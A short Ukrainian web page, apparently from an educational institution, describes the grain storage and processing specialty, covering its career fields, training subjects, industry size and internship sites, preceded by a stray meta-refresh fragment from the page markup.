http-equiv="Refresh" content="5; URL=http://www.t55555.at.ua"

Спеціальність Зберігання і переробка зерна

Діяльність фахівців пов'язана з технологіями зберігання зерна на елеваторах, переробкой зерна в крупу та борошно на борошномельних і круп'яних заводах і виробництвом комбікормів.

Підготовка майбутніх фахівців об'єднує фундаментальні предмети з інженерно-технічними та економічними із застосуванням інформаційних технологій.

В Україні більше 800 підприємств, в т.ч приватних займаються зберіганням і переробкою зерна, також є представництва зарубіжних фірм. Всі вони вимагають висококваліфікованих фахівців у галузі зернопереробки.

Закріплюють теорію і набирають досвід студенти в час практик на підприємствах галузі, найбільші з них: "Дніпромлин", Дніпропетровський комбінат харчових концентратів, "Універсалзернопродукт".